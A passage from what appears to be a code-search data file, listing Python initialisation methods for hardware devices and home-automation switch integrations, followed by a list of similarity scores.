initial=RPIO.LOW)", "def __init__(self, aTimeout = None, aProlongFactor = None):\n if aTimeout is None:\n self.timeout = self.DEFAULT_TIMEOUT\n else:\n self.timeout = aTimeout\n if aProlongFactor is None:\n self.prolongFactor = self.DEFAULT_PROLONG\n else:\n self.prolongFactor = aProlongFactor\n\n #flags for inverted use of control pins\n #used for some hardware\n self.invertRST = 0\n self.invertTEST = 0\n self.swapRSTTEST = 0\n self.telosLatch = 0\n self.telosI2C = 0\n\n self.z1 = 0\n\n self.protocolMode = self.MODE_BSL\n self.BSLMemAccessWarning = 0 #Default: no warning.\n self.slowmode = 0", "def __init__(self, address=0x68, **kwargs):\n I2CDevice.__init__(self, address, **kwargs)\n logger.info(\"Created new si5324 instance with address 0x{:02X}.\".format(address))\n self.iCAL_required = True # An iCAL is required at least once before run", "def __init__(self,\n device_name,\n create_device_func,\n props,\n hub_name_prop,\n primary_port_prop,\n secondary_port_prop,\n ethernet_switch_prop,\n ethernet_port_prop,\n get_switchboard_if_initialized,\n power_and_data_share_cable=False,\n pre_off_func=None):\n super().__init__(device_name=device_name)\n\n self._create_device_func = create_device_func\n self._hub_name_prop = hub_name_prop\n self._primary_port_prop = primary_port_prop\n self._secondary_port_prop = secondary_port_prop\n self._props = props\n self._ethernet_switch = None\n\n # Set the properties\n self._get_switchboard_if_initialized = get_switchboard_if_initialized\n self._power_and_data_share_cable = power_and_data_share_cable\n self._pre_off_func = pre_off_func\n self._ethernet_switch_prop = ethernet_switch_prop\n self._ethernet_port_prop = ethernet_port_prop", "def __init__(self, parent, endpoint):\n Wemo_Endpoint.__init__(self, parent, endpoint)\n self.device_type = self._Parent._DeviceTypes.get('wemo_switch')\n self.FEATURES.update({\n FEATURE_BRIGHTNESS: False,\n FEATURE_PERCENT: False,\n FEATURE_NUMBER_OF_STEPS: False\n })", "def __init__(self, robot, switch_type):\n self.type = switch_type\n self.robot = robot\n self.lock = False\n self.last_lock_time = None\n self.graceful_state = False\n self._state = None", "def __init__(self, *args):\n _snap.TUIntH_swiginit(self, _snap.new_TUIntH(*args))", "def __init__(self):\n super().__init__()\n\n # Gadget state\n \n self.isDoorOpen = False\n self.verified = True\n\n # Ev3dev initialization\n self.leds = Leds()\n self.sound = Sound()\n self.drive = MoveTank(OUTPUT_B, OUTPUT_C)\n \n self.ir_sensor = InfraredSensor()\n self.ir_sensor.mode = self.ir_sensor.MODE_IR_REMOTE\n self.color_sensor = ColorSensor()\n self.color_sensor.mode = 'COL-COLOR' # WHITE\n\n # Start threads\n threading.Thread(target=self._patrol_thread, daemon=True).start()", "def __init__(self, **kwargs):\n self.session = None\n\n super(Password, self).__init__(**kwargs)\n\n if not self._mfa_supported():\n self._mfa_passcode = None", "def __init__(self, device):\n methods = ['on', 'off', 'toggle']\n if all(m in dir(device) for m in methods):\n self._impl = device\n else:\n raise TypeError(\"'device' must contain LED methods: \" +\n str(methods))", "async def initialize(self, hw_init=False, init_speed: str = \"200 sec / stroke\"):\n await self.pump_io.initialize()\n # Test connectivity by querying the pump's firmware version\n fw_cmd = Protocol1Command(command=\"U\", target_pump_num=self.address)\n self.metadata.version = await self.pump_io.write_and_read_reply_async(fw_cmd)\n logger.info(\n f\"Connected to Hamilton ML600 {self.name} - FW version: 
{self.metadata.version}!\"\n )\n\n if hw_init:\n await self.initialize_pump(speed=ureg.Quantity(init_speed))", "def __init__(self, hass):\n self.hass = hass\n self._volume = 0\n self._state = STATE_OFF", "def __init__(self, hass):\n self.hass = hass\n self._volume = 0\n self._state = STATE_OFF", "def initialize():\n dislin.disini()", "def __init__(self, *args):\n _snap.TUIntV_swiginit(self, _snap.new_TUIntV(*args))", "def __init__(self, spi, dc, rst, led):\n self._spi = spi\n self._spi.open()\n self._spi.set_mode(0)\n self._spi.set_clock_frequency(4000000)\n\n self._dc = dc\n self._rst = rst\n self._led = led\n self._enabled = False", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n self._attr_name = f\"{self.device.display_name} {self.entity_description.name}\"\n self._switch_type = self.entity_description.key", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n server_info = entry_data[\"server_info\"]\n\n if not protect_data.data:\n return\n\n ir_on = entry.data[CONF_IR_ON]\n if ir_on == \"always_on\":\n ir_on = \"on\"\n\n ir_off = entry.data[CONF_IR_OFF]\n if ir_off == \"led_off\":\n ir_off = \"autoFilterOnly\"\n elif ir_off == \"always_off\":\n ir_off = \"off\"\n\n switches = []\n for switch, switch_type in SWITCH_TYPES.items():\n required_field = switch_type[_SWITCH_REQUIRES]\n for camera_id in protect_data.data:\n # Only Add Switches if Camera supports it.\n if required_field and not protect_data.data[camera_id].get(required_field):\n continue\n\n switches.append(\n UnifiProtectSwitch(\n upv_object,\n protect_data,\n server_info,\n camera_id,\n switch,\n ir_on,\n ir_off,\n )\n )\n _LOGGER.debug(\"UNIFIPROTECT SWITCH CREATED: %s\", switch)\n\n async_add_entities(switches)", "def __init__(self, communication, dev_selector):\n super().__init__(communication, dev_selector,\n self.ADDR_MODE_8,\n self.TRANSFER_MSB_FIRST)\n self.init()", "def __init__(self, *args):\n _snap.TUInt_swiginit(self, _snap.new_TUInt(*args))", "def __init__(self, username, password, deviceid):\n self.deviceid = int(deviceid)\n self.session = requests.Session()\n\n self.auth_requestparm = {\n 'timeOffset': 240,\n 'RememberMe': 'false',\n 'UserName': username,\n 'Password': password,\n }\n\n self.query_headers[\"Referer\"] = self.BASEURL + \"/Device/Control/\" + str(deviceid)\n self.change_request[\"DeviceID\"] = int(deviceid)\n self.status = \"\"", "def __init__(self,address,InUseBy=None,Bus = None,Ident=''):\n self.Ident = Ident\n self.InUseBy = InUseBy\n VersionStrip =Ident.split(' ')[0].lower()\n if Ident !='' and VersionStrip in I2C.DeviceList:\n self.InUseBy = I2C.DeviceList[VersionStrip](Bus,address)\n else:\n self.Type=None\n if self.InUseBy!=None:\n self.InUseBy.Ident=VersionStrip", "def _init_io(self):\n GPIO.setwarnings(False)\n GPIO.setmode( GPIO.BCM )\n pins = [ self._spi_dc ]\n for pin in pins:\n GPIO.setup( pin, GPIO.OUT )", "def __init__(self):\n super().__init__()\n\n # Robot state\n self.ask_mode = False\n\n # Connect two large motors on output ports B and C\n self.sound = Sound()\n self.leds = Leds()\n self.p1 = TouchSensor(INPUT_1)\n self.p2 = TouchSensor(INPUT_2)\n self.p3 = TouchSensor(INPUT_3)\n self.p4 = TouchSensor(INPUT_4)", "def __init__(self, device):\n 
self._unique_id = device\n self._device = AehW4a1(device)\n self._fan_modes = FAN_MODES\n self._swing_modes = SWING_MODES\n self._preset_modes = PRESET_MODES\n self._attr_available = False\n self._on = None\n self._current_temperature = None\n self._target_temperature = None\n self._attr_hvac_mode = None\n self._fan_mode = None\n self._swing_mode = None\n self._preset_mode = None\n self._previous_state = None", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n\n if self.device.is_privacy_on:\n extra_state = self.extra_state_attributes or {}\n self._previous_mic_level = extra_state.get(ATTR_PREV_MIC, 100)\n self._previous_record_mode = extra_state.get(\n ATTR_PREV_RECORD, RecordingMode.ALWAYS\n )\n else:\n self._previous_mic_level = self.device.mic_volume\n self._previous_record_mode = self.device.recording_settings.mode", "def GPIO_initialization():\n GPIO.setmode(GPIO.BCM)\n\n GPIO.setup(Sensor.IN_1, GPIO.OUT)\n GPIO.setup(Sensor.IN_2, GPIO.OUT)\n GPIO.setup(Sensor.EN, GPIO.OUT)\n\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['RED_STOP'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['YELLOW_CW'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['GREEN_CCW'], GPIO.IN)\n\n GPIO.output(Sensor.IN_1, GPIO.LOW)\n GPIO.output(Sensor.IN_2, GPIO.LOW)", "def __init__(self):\r\n global modrive\r\n self.state = DisconnectedState() # default is disarmed\r\n self.encoder_time = 0", "def __init__(\n self,\n netatmo_device: NetatmoDevice,\n ) -> None:\n super().__init__(netatmo_device.data_handler)\n\n self._switch = cast(NaModules.Switch, netatmo_device.device)\n\n self._id = self._switch.entity_id\n self._attr_name = self._device_name = self._switch.name\n self._model = self._switch.device_type\n self._config_url = CONF_URL_CONTROL\n\n self._home_id = self._switch.home.entity_id\n\n self._signal_name = f\"{HOME}-{self._home_id}\"\n self._publishers.extend(\n [\n {\n \"name\": HOME,\n \"home_id\": self._home_id,\n SIGNAL_NAME: self._signal_name,\n },\n ]\n )\n self._attr_unique_id = f\"{self._id}-{self._model}\"\n self._attr_is_on = self._switch.on", "def __init__(self):\r\n\t\tself.introducer()\r\n\t\tif self.code_mode == \"1\":\r\n\t\t\tif self.input_mode == \"1\":\r\n\t\t\t\tself.encrypt_message()\r\n\t\t\telse:\r\n\t\t\t\tself.encrypt_text_file()\r\n\t\t\t\t#print(\"work in progress\")\r\n\t\telif self.code_mode == \"2\":\r\n\t\t\tif self.input_mode == \"1\":\r\n\t\t\t\tself.decrypt_message()\r\n\t\t\telse:\r\n\t\t\t\tself.decrypt_text_file()\r\n\t\telse:\r\n\t\t\tif self.input_mode == \"1\":\r\n\t\t\t\tself.hack_message()\r\n\t\t\telse:\r\n\t\t\t\tself.hack_text_file()", "def __init__(self, firmware_package=None, verbose=False):\n\n # Set up the OV device to handle packets.\n super().__init__(verbose=verbose)\n\n # If we weren't handed a firmware package, look for the default.\n if firmware_package is None:\n package_file = find_openvizsla_asset(self.DEFAULT_FIRMWARE_PACKAGE_NAME)\n firmware_package = OVFirmwarePackage(package_file)\n \n self.verbose = verbose\n self.firmware = firmware_package\n\n # Default to being unopened, and assume an unprogrammed FPGA.\n self._is_open = False\n self._fpga_loaded = False\n\n # Create the FTDI connection to our OV device.\n self.ftdi = FTDIDevice()\n\n # Set up \"memory windows\" that allow us to access the OV device's I/O and \n mmio_map = firmware_package.get_register_map()\n self.regs 
= OVMemoryWindow(mmio_map, self.read_io_byte, self.write_io_byte)\n self.ulpi_regs = USB334xMemoryWindow(self.read_ulpi_register, self.write_ulpi_register)\n\n # Start off with an unvalidated ULPI clock.\n self.ulpi_clock_validated = False\n\n # Build our local packet handlers.\n self._set_up_io_handlers()", "def init_VI():\n\n\tprint 'Setting VI'\n\tvi = UsbVehicleInterface(payload_format=\"json\")\n\n\treturn vi", "def __init__(self):\n # Initialize key variables\n self.reserved = '_SYSTEM_RESERVED_'\n self.config = configuration.Config()", "def __init__(self, port=\"AD1\", use_mutex=False):\n self.use_mutex = use_mutex\n\n try:\n bus = ports[port]\n except KeyError:\n bus = \"RPI_1SW\"\n\n ifMutexAcquire(self.use_mutex)\n try:\n # print(\"INSTANTIATING ON PORT {} OR BUS {} WITH MUTEX {}\".format(port, bus, use_mutex))\n super(self.__class__, self).__init__(bus = bus)\n # on GPG3 we ask that the IMU be at the back of the robot, facing outward\n # We do not support the IMU on GPG2 but leaving the if statement in case\n if bus != \"RPI_1SW\":\n self.BNO055.set_axis_remap( BNO055.AXIS_REMAP_X,\n BNO055.AXIS_REMAP_Z,\n BNO055.AXIS_REMAP_Y,\n BNO055.AXIS_REMAP_POSITIVE,\n BNO055.AXIS_REMAP_NEGATIVE,\n BNO055.AXIS_REMAP_POSITIVE)\n except Exception as e:\n print(\"Initiating error: \"+str(e))\n raise\n finally:\n sleep(0.1) # add a delay to let the IMU stabilize before control panel can pull from it\n ifMutexRelease(self.use_mutex)", "def __init__(__self__, *,\n algorithm: str,\n protection_level: str):\n pulumi.set(__self__, \"algorithm\", algorithm)\n pulumi.set(__self__, \"protection_level\", protection_level)", "def __init__(self, *args):\n _snap.TUndirNet_swiginit(self, _snap.new_TUndirNet(*args))", "def __init__(self, *args):\n _snap.TFltUIntKd_swiginit(self, _snap.new_TFltUIntKd(*args))", "def init_led():\r\n global led\r\n led = LED(LED_GPIO_PIN)\r\n led.off()", "def __init__(self, uid):\n Device.__init__(self, uid)\n\n self.expected_name = 'Analog Out Bricklet'\n\n self.binding_version = [1, 0, 0]", "def init(self, mode: int, pull: int = -1, *,\n value: Optional[int] = None, alt: Optional[int] = None) -> None:\n ...", "def __init__(self, verbose=False, monitor=False):\n # Superclass call\n SwapInterface.__init__(self, None, verbose) \n # Print SWAP activity\n self._printSWAP = monitor\n # Mote address in SYNC mode\n self._addrInSyncMode = None", "def teleopInit(self):\n self.myRobot.setSafetyEnabled(True)", "def __init__(__self__, *,\n bit_locker_key: str,\n disk_serial_number: str):\n pulumi.set(__self__, \"bit_locker_key\", bit_locker_key)\n pulumi.set(__self__, \"disk_serial_number\", disk_serial_number)", "def __init__(self, *args):\n _snap.TUIntUIntPr_swiginit(self, _snap.new_TUIntUIntPr(*args))", "def __init__(self):\n\n super().__init__()\n\n self.active = True\n self.driver = Driver.instance()\n self.sensor_manager = SensorManager.instance()\n\n self.pwm = Adafruit_PCA9685.PCA9685(address=0x40, busnum=1) # create PCA9685-object at I2C-port\n self.pwm.set_pwm_freq(50)\n\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(20, GPIO.OUT)\n GPIO.setup(21, GPIO.OUT)\n GPIO.setup(26, GPIO.OUT)\n self.driven_distance = 0", "def __init__(self,\r\n enabled=None,\r\n spare_serial=None,\r\n uplink_mode=None,\r\n virtual_ip_1=None,\r\n virtual_ip_2=None):\r\n\r\n # Initialize members of the class\r\n self.enabled = enabled\r\n self.spare_serial = spare_serial\r\n self.uplink_mode = uplink_mode\r\n self.virtual_ip_1 = virtual_ip_1\r\n self.virtual_ip_2 = virtual_ip_2", "def 
__init__(self):\n _hypre.HypreIdentity_swiginit(self, _hypre.new_HypreIdentity())", "def __init__(self, device_mode, loop):\n self.loop = loop\n self.device_mode = device_mode\n if self.device_mode == \"stationary\":\n self.openface = OpenFaceInstance()\n self.openface.startProcess()\n self.stationary_eye_tracker = StationaryEyeTracker()\n elif self.device_mode == \"mobile\":\n self.openpose = OpenPoseInstance()\n self.openpose.startProcess()\n self.mobile_eye_tracker = MobileEyeTracker()\n self.mobile_eye_tracker.calibrate()\n\n self.wristband = Wristband(self.loop)", "def __init__(self, ledSet):\n\n self.ledSet = ledSet\n self.resetBlock()\n self.currentPower = None", "def Initialise(self):\n self.__m_Platform.Initialise()\n self.__m_Pump.Initialise( False )", "def __init__(self):\n self._read_calibration_data()\n self.configure_sensor(\n TemperatureOversamplings.x08,\n PressureOversamplings.x16,\n HumidityOversamplings.x08,\n IIRFilterCoefficients.FC_003,\n 250,\n 250)", "def __init__(self, parent, endpoint):\n self._Parent = parent\n self.endpoint = endpoint\n self.device_type = self._Parent._DeviceTypes.get('wemo_switch')\n self.device_commands = parent._Devices.device_commands\n self.yombo_device = None\n self.state = self.endpoint.get_state()\n self.commands = {}\n self.last_request_id = None\n self.device_mfg = \"wemo\"\n self.FEATURES: dict = {}", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_i2c'] = True", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_i2c'] = True", "def __init__(self, hdw=['Soundcard'], devicename='dev1'):\n self.debugFlag = False\n self.task = None # NI Task\n self.required_hardware = hdw # Require specific hardware \n self.hardware = [] # list of hardware actually found on this system\n self.find_hardware(device_info={'devicename': devicename}) # population the self.hardware list", "def __init__(\n self,\n avm_wrapper: AvmWrapper,\n device_friendly_name: str,\n switch_info: SwitchInfo,\n ) -> None:\n super().__init__(avm_wrapper, device_friendly_name)\n\n self._description = switch_info[\"description\"]\n self._friendly_name = switch_info[\"friendly_name\"]\n self._icon = switch_info[\"icon\"]\n self._type = switch_info[\"type\"]\n self._update = switch_info[\"callback_update\"]\n self._switch = switch_info[\"callback_switch\"]\n\n self._name = f\"{self._friendly_name} {self._description}\"\n self._unique_id = f\"{self._avm_wrapper.unique_id}-{slugify(self._description)}\"\n\n self._attributes: dict[str, str] = {}\n self._is_available = True", "def _initialize_hardware(self):\n # Import\n try:\n import board\n import busio\n import adafruit_vl6180x\n except Exception as ex:\n logging.error(\n '\\n *** ERROR importing Adafruit libraries: {}'.format(\n ex,\n ),\n )\n\n # Things failed, so we must be running locally, not on a widget;\n # don't bother hooking up the VL6180X\n return\n\n # Initialize I2C and VL6180X\n try:\n i2c = busio.I2C(board.SCL, board.SDA)\n self._sensor = adafruit_vl6180x.VL6180X(i2c)\n except Exception as ex:\n logging.error(\n '\\n *** ERROR initializing I2C/LSM303: {}'.format(ex),\n )\n\n self._initialize_id_led()", "def __init__(self):\r\n\r\n super(Bypass, self).__init__()\r\n\r\n # Initialize public scalar attributes.\r\n self.specification = 0 # MIL-C-25 or MIL-C-12889.\r\n self.spec_sheet = 0 #\r\n if self.hazard_rate_type < 3: # MIL-HDBK-217\r\n self.reference_temperature = 358.0\r\n\r\n# def set_attributes(self, values):\r\n \"\"\"\r\n Method to set the Capacitor 
data model attributes.\r\n\r\n :param tuple values: tuple of values to assign to the instance\r\n attributes.\r\n :return: (_code, _msg); the error code and error message.\r\n :rtype: tuple\r\n \"\"\"", "def init(self):\n self.IP_ADDRESS = \"192.168.16.55\"\n self.PORT = 8888\n self.windFreakConnection = windFreakClient.ConnectionConstantFrequency(IP_ADDRESS=self.IP_ADDRESS, port=self.PORT) \n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName", "def __init__(self):\n self.if0 = None\n self.if1 = None", "def __init__(self):\n self.if0 = None\n self.if1 = None", "def __init__(self, *args):\n _snap.TUndirNetNodeI_swiginit(self, _snap.new_TUndirNetNodeI(*args))", "def __init__(self):\n super().__init__(interface.RemoteControl, DEFAULT_PRIORITIES)", "def _use_existing_configuration(self):\n HW_Init(self.ftdi, None)", "def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n version: Optional[pulumi.Input[str]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if version is not None:\n pulumi.set(__self__, \"version\", version)" ]
[ "0.668283", "0.6222391", "0.6021048", "0.592539", "0.57956624", "0.5783978", "0.5776359", "0.5716881", "0.5700141", "0.56954783", "0.5673299", "0.5581777", "0.55620766", "0.55259913", "0.5523816", "0.5519903", "0.5512638", "0.55101365", "0.5487694", "0.5478698", "0.5470831", "0.5470184", "0.5468139", "0.54515016", "0.5416385", "0.5405412", "0.539717", "0.53865606", "0.53601694", "0.5348798", "0.53384244", "0.533447", "0.53272384", "0.5321442", "0.5320724", "0.53125286", "0.5311459", "0.5311392", "0.5301872", "0.5297271", "0.52922845", "0.5281517", "0.5274659", "0.52712303", "0.52597964", "0.52489656", "0.5239923", "0.5239923", "0.5239008", "0.52217937", "0.52197635", "0.52192956", "0.521752", "0.5217014", "0.52097213", "0.5199177", "0.5192679", "0.5191767", "0.5186588", "0.5185998", "0.51824737", "0.51772666", "0.5172271", "0.5171375", "0.51675385", "0.51647663", "0.5149305", "0.5140282", "0.5140026", "0.51226175", "0.5110875", "0.51026803", "0.5100077", "0.5099554", "0.5096497", "0.5092766", "0.5083534", "0.5082922", "0.50810903", "0.5079734", "0.5075286", "0.50749296", "0.5070515", "0.5062264", "0.50614285", "0.505453", "0.5044989", "0.5044726", "0.5044726", "0.5041321", "0.50360453", "0.5034403", "0.503417", "0.5028542", "0.50262135", "0.50262135", "0.50259113", "0.50250846", "0.5024875", "0.5022616" ]
0.708648
0
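The record above pairs the query "Initialize an Unifi Protect Switch." with its positive Python document, a list of hard-negative documents, a score for every negative, the positive document's own score (0.708648), and its rank among the negatives (0). Consistent with both records shown here, document_rank appears to be the number of negatives whose score is at least as high as the positive document's score (13 for the previous record, 0 for this one). A minimal sketch of recomputing that rank from a single record, assuming each record is a mapping with the field names shown above (the helper name is illustrative, not part of the dataset):

    def rank_of_document(record):
        # Count the negatives scoring at least as high as the positive
        # document; 0 means the positive document would be ranked first.
        doc_score = float(record["document_score"])
        return sum(1 for s in record["negative_scores"] if float(s) >= doc_score)

    # Values taken from the record above: document_score 0.708648 and the
    # first few entries of its negative_scores list.
    record = {
        "document_score": "0.708648",
        "negative_scores": ["0.668283", "0.6222391", "0.6021048", "0.592539"],
    }
    print(rank_of_document(record))  # 0, matching the document_rank field above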
Poll for status regularly.
def should_poll(self): return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def poll(self):\n self.poll_function(self.connection)", "def wait_for_status(self, status):\n code = self.instance.state['Code']\n while code != status:\n time.sleep(3)\n self.instance.reload()\n code = self.instance.state['Code']", "def refresh_status() -> None:\n ...", "def poll(self):\n while self.running and reactor._started and not reactor._stopped:\n self.check_response_queue()\n sleep(0.5)", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def _StatusUpdateThreadMain(self):\n while self._status_update_active:\n self._UpdateStatus()\n time.sleep(self._status_update_interval)", "def periodic_timer(self):\n while self.running:\n self.sendStatusQuery()\n time.sleep(REPORT_INTERVAL)", "def poll_for_active_status(self, server_id, req_status=\"ACTIVE\"):\n status = \"BUILDING\"\n iteration = 30\n while status.upper() != req_status.upper() \\\n or status.upper() != \"ERROR\":\n server_info = self.show_server(server_id)\n if not isinstance(server_info, dict):\n return\n status = server_info['status']\n LOG_OBJ.debug(\"Server status : %s\" % status)\n if status.upper() in [req_status.upper(), 'ERROR']:\n break\n LOG_OBJ.debug(\"Waiting till server goes to %s state...\"\n % req_status)\n time.sleep(20)\n iteration -= 1\n if not iteration:\n err_msg = \"The server:%s is NOT in %s state\" \\\n \"within 10 minutes\" % (server_id, status)\n LOG_OBJ.error(err_msg)\n return \"POLL_TIME_EXCEEDED\"\n\n LOG_OBJ.debug(\"Server becomes %s\" % status)\n\n return status", "def poll(self):\n return False", "def setup_poll(self):\n while True:\n try:\n self.do_polling()\n time.sleep(0.01)\n except KeyboardInterrupt:\n print(self.get_stream())\n exit()", "async def status_update_loop(self):\n self.status_message_update_waiter = sleep(UPDATE_INTERVAL, KOKORO)\n \n while self.state == CHANNEL_MOVE_STATE_NONE:\n set_value = await self.status_message_update_waiter\n # sleep sets by `None`\n if set_value is not None:\n break\n \n self.status_message_update_waiter = sleep(UPDATE_INTERVAL, KOKORO)\n await self.update_status_message()\n continue\n \n await self.update_status_message()\n await self.send_done_notification()\n return", "def refresh_status(self):\n\n pass", "def should_poll(self):\r\n return False", "def long_poll(self):\n now = time.time()\n self.l_debug(\"long_poll\",\"now=%d\" % (now))\n self._set_st(now)\n self.report_isycmd('DON')\n return", "def poll(self):\n raise NotImplementedError()", "def _poll(self):\n return self.zmq_core.poll(10)", "async def _watch_status(self, job_id, job_paths):\n status_path = job_paths['status.json']\n\n watcher = aionotify.Watcher()\n watcher.watch(status_path, aionotify.Flags.CLOSE_WRITE)\n await watcher.setup(self.loop)\n try:\n while True:\n try:\n await self._read_status(job_id, job_paths)\n await watcher.get_event()\n self.logger.debug(f'Detected status change for job {job_id}')\n except concurrent.futures.CancelledError:\n # Break loop (likely normal exit through task cancellation)\n break\n except Exception: # 
pylint: disable=broad-except\n self.logger.exception(f'Exception while watching status of job {job_id}')\n finally:\n watcher.unwatch(status_path)\n watcher.close()", "def status(self) -> NoReturn:\n\n curr_status= self.percent_done()\n while(curr_status < 100):\n\n update_status(name=self.name, status=curr_status)\n time.sleep(0.5)\n\n curr_status = self.percent_done()\n\n update_status(name=self.name, status=curr_status)", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def wait_for_object_status(self, object_name, object_id, status,\n timeout=120, interval=3):\n cmd = self.object_cmd(object_name, 'show')\n start_time = time.time()\n while time.time() - start_time < timeout:\n if status in self.cinder(cmd, params=object_id):\n break\n time.sleep(interval)\n else:\n self.fail(\"%s %s did not reach status %s after %d seconds.\"\n % (object_name, object_id, status, timeout))", "def poll(self):\n if self._server:\n self._server.poll()", "async def run(self):\n while True:\n await asyncio.sleep(0)\n # See if any sockets have anything\n try:\n socks, events = self.poller.poll(1000)\n for sock, event in zip(socks,events):\n if sock in self.subscriptions:\n states = sock.recv_json()\n await self.main_server.sync_states(states)\n\n # Nothing to report - Poller did not find any sockets with updates\n except ValueError:\n pass\n # Exiting\n except KeyboardInterrupt:\n break", "async def _check_status(\n self, update: Update, context: ContextTypes.DEFAULT_TYPE\n ) -> None:\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n await update.message.reply_markdown(\"*System Status*\")\n for key in info:\n await update.message.reply_text(f\"{key}: {info[key]}\")", "async def check_status(self):\n while True:\n async with self._loop_lock:\n new_monitor_processes = {}\n for class_name in self.monitor_processes:\n monitor = self.monitor_processes[class_name][\"process\"]\n if monitor.poll() is not None:\n log = f\"Monitor {class_name} has stopped with code: {monitor.returncode}\"\n if monitor.returncode:\n self.general_logger.warning(log)\n if self.config[\"WebhookConfig\"][\"crash_webhook\"]:\n embed = get_mm_crash_embed(\n \"Monitor \" + class_name,\n monitor.returncode,\n monitor.pid,\n )\n ts = datetime.now().strftime(\n self.config[\"WebhookConfig\"][\"timestamp_format\"]\n )\n\n embed.set_footer(\n text=f\"{self.config['WebhookConfig']['provider']} | {ts}\",\n icon_url=self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n )\n data = json.dumps(\n {\n \"embeds\": [embed.to_dict()],\n \"username\": \"MonitorManager process watcher\",\n \"avatar_url\": self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n }\n )\n r = await self.client.fetch(\n self.config[\"WebhookConfig\"][\"crash_webhook\"],\n method=\"POST\",\n body=data,\n headers={\"content-type\": \"application/json\"},\n raise_error=False,\n )\n else:\n self.general_logger.info(log)\n else:\n new_monitor_processes[class_name] = self.monitor_processes[\n class_name\n ]\n self.monitor_processes = new_monitor_processes\n\n new_scraper_processes = {}\n for class_name in self.scraper_processes:\n scraper = self.scraper_processes[class_name][\"process\"]\n if scraper.poll() is not None:\n log = f\"Scraper {class_name} has stopped with code: {scraper.returncode}\"\n if scraper.returncode:\n 
self.general_logger.warning(log)\n if self.config[\"WebhookConfig\"][\"crash_webhook\"]:\n embed = get_mm_crash_embed(\n \"Scraper \" + class_name,\n scraper.returncode,\n scraper.pid,\n )\n ts = datetime.now().strftime(\n self.config[\"WebhookConfig\"][\"timestamp_format\"]\n )\n\n embed.set_footer(\n text=f\"{self.config['WebhookConfig']['provider']} | {ts}\",\n icon_url=self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n )\n data = json.dumps(\n {\n \"embeds\": [embed.to_dict()],\n \"username\": \"MonitorManager process watcher\",\n \"avatar_url\": self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n }\n )\n r = await self.client.fetch(\n self.config[\"WebhookConfig\"][\"crash_webhook\"],\n method=\"POST\",\n body=data,\n headers={\"content-type\": \"application/json\"},\n raise_error=False,\n )\n else:\n self.general_logger.info(log)\n else:\n new_scraper_processes[class_name] = self.scraper_processes[\n class_name\n ]\n self.scraper_processes = new_scraper_processes\n await asyncio.sleep(1)", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def poll(self, poll_input):", "def poll_thread():\n while not stop_flag.wait(0.100): # poll every 100ms\n check_jobs()", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "async def check_connection_status(self):\n while True:\n if not self.connected:\n self.log.error(\"Lost connection to spa, attempting reconnect.\")\n await self.connect()\n await asyncio.sleep(10)\n continue\n if (self.lastupd + 5 * self.sleep_time) < time.time():\n self.log.error(\"Spa stopped responding, requesting panel config.\")\n await self.send_panel_req(0, 1)\n await asyncio.sleep(self.sleep_time)", "def wait_for_update(self):\n while \"updating_db\" in self.status():\n time.sleep(1)", "def monitor(self, target):\n while self.RUNNING:\n check_time = datetime.now()\n next_check = check_time + timedelta(seconds=target[\"frequency\"])\n\n try:\n self.produce(\n get(target[\"url\"], timeout=target[\"frequency\"] - 0.5),\n target.get(\"regex\"),\n check_time,\n )\n except Timeout:\n self.logger.warning(\"Check for %s timed out\", target[\"url\"])\n except RequestException as e:\n self.logger.error(e)\n except re.error as e:\n self.logger.error(e)\n break\n\n # Busy loop until next check_time\n while datetime.now() < next_check:\n sleep(1)", "def poll(self):\n now = time.time()\n if now > self._next_beat_t:\n self._next_beat_t = now + 60\n self.set_driver('ST', now, report=True)\n self.report_isycmd('DON')\n return True", "def status_task():\n props = [\n (STAT_TIME, current_time),\n (STAT_CONDITION, weather_condition)\n ]\n\n # Send the status request with the current time and condition.\n send_status_request(props)\n\n # Create and start a timer to repeat this task periodically.\n t = Timer(report_interval, status_task)\n t.setDaemon(True)\n t.start()", "async def get_status():", "def check(self):\n logging.info(\"rate limit remaining %s\" % self.remaining)\n while self.remaining <= 1:\n now = time.time()\n logging.debug(\"rate limit < 1, now=%s and reset=%s\", now,\n self.reset)\n if self.reset and now < self.reset:\n # 